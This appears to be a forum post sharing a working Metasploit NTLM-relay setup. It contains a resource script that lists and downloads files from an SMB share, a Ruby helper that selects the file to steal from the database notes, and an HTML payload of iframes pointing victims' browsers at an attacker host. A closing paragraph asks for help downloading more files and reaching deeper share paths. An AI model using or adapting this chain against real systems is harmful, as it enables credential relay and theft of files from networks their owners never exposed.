resource.rb
use auxiliary/server/http_ntlmrelay
unset all
notes -d
set RHOST
set RPORT 445
set RTYPE SMB_LS
set RURIPATH
set URIPATH test1
run
set RTYPE SMB_GET
set SYNCFILE syncfile.rb
set URIPATH test2
run
syncfile.rb
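print_status("looking for data...")
# Walk the notes saved in the framework database by the earlier SMB_LS run.
framework.db.notes.each do |note|
  if (note.ntype == 'ntlm_relay')
    for app in note.data[:Response]
      # app[0] is the entry name, app[1] its metadata; type "F" marks a file.
      p1 = app[1].to_s.split(",")
      if (p1[0] == '{"type"=>"F"')
        # Each match overwrites RURIPATH, so only the last file found is kept.
        datastore['RURIPATH'] = note.data[:RURI] + app[0]
      end
    end
  end
  puts(datastore['RURIPATH'])
end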
payload.html
[iframe src="http://kali:8080/test1"]
[iframe src="http://kali:8080/test2"]
The issues I'm having are: this method can only download one file at the moment, and if the share's path goes deeper than one directory (i.e. path\to\share\), test1 does not authenticate properly and the attack fails. I have just started messing with the source code of the module but have not gotten anywhere yet. I will keep you posted if I figure anything out. If you have a solution, please let me know! Thank you and enjoy.